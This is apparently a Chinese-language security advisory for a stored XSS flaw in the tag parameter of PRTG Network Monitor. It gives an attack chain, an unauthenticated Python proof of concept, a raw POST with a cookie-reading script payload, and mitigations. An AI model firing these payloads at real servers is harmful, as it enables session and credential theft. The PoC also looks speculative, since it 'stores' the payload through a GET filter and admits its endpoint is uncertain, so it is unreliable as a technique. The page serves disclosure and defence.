CVE-2025-67833 CVSS 6.1 中危

CVE-2025-67833: Paessler PRTG Network Monitor tag参数存储型XSS漏洞

披露日期: 2026-01-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-67833

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Paessler PRTG Network Monitor

漏洞概述

CVE-2025-67833是Paessler PRTG Network Monitor中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于25.4.114之前的版本中，攻击者可以通过未认证的方式利用tag参数注入恶意JavaScript代码。由于该漏洞为存储型XSS，恶意脚本会被永久保存在服务器端，所有访问受影响页面的用户都会受到攻击。PRTG Network Monitor是一款广泛使用的网络监控工具，常用于企业环境中监控服务器、网络设备和应用程序。此漏洞无需任何认证即可利用，但需要诱导用户进行交互才能触发恶意脚本执行，可能导致会话劫持、敏感信息窃取或进一步的攻击。

技术细节

该漏洞是由于PRTG Network Monitor在处理tag参数时未对用户输入进行充分的HTML转义和验证。攻击者构造包含恶意JavaScript代码的tag参数值，当该值被存储并在Web界面中展示时，恶意代码将被执行。攻击者可以通过以下方式利用：1) 构造恶意payload如<script>alert(document.cookie)</script>作为tag参数值；2) 由于是存储型XSS，payload会永久保存在系统数据库中；3) 当管理员或用户访问包含该tag的页面时，恶意脚本在用户浏览器上下文中执行。由于PRTG具有较高的系统权限，成功的XSS攻击可能进一步导致敏感监控数据泄露或凭据窃取。

攻击链分析

STEP 1

步骤1

攻击者识别目标PRTG Network Monitor实例，发现其版本低于25.4.114

STEP 2

步骤2

攻击者通过API或Web界面构造包含恶意JavaScript代码的tag参数值

STEP 3

步骤3

恶意payload通过tag参数注入，由于未进行输入验证，脚本被存储在服务器数据库中

STEP 4

步骤4

当管理员或其他用户访问包含该tag的页面或传感器列表时，恶意脚本在用户浏览器中执行

STEP 5

步骤5

攻击者通过XSS成功窃取用户会话cookie、凭据或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-67833 PoC - PRTG Network Monitor XSS via tag parameter
# Target: PRTG Network Monitor before version 25.4.114

TARGET_URL = "http://target-server:8080"

# Malicious XSS payload
xss_payload = '<script>alert(document.cookie)</script>'

# Step 1: Inject XSS payload via tag parameter (unauthenticated)
# The exact endpoint depends on PRTG installation
injection_endpoint = f"{TARGET_URL}/api/table.json"

params = {
    'content': 'sensors',
    'columns': 'name,tag',
    'filter_tag': xss_payload,  # XSS injection point
    'username': 'public',
    'password': ''
}

print(f"[*] Sending XSS payload to {injection_endpoint}")
print(f"[*] Payload: {xss_payload}")

try:
    response = requests.get(injection_endpoint, params=params, timeout=10)
    print(f"[+] Response Status: {response.status_code}")
    if response.status_code == 200:
        print("[+] Payload sent successfully - stored XSS injected")
        print("[+] Payload will execute when viewed in PRTG dashboard")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Alternative: Direct tag parameter injection
# POST /api/duplicateobject.htm HTTP/1.1
# Host: target-server:8080
# tags=<script>alert(document.cookie)</script>

影响范围

PRTG Network Monitor < 25.4.114

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制PRTG管理界面的访问权限，仅允许受信任的IP地址访问；2) 启用Web应用防火墙(WAF)规则检测和阻止XSS攻击特征；3) 提醒用户不要点击来源不明的链接；4) 定期检查日志中是否存在异常的tag参数值；5) 考虑使用浏览器安全插件检测潜在的XSS攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表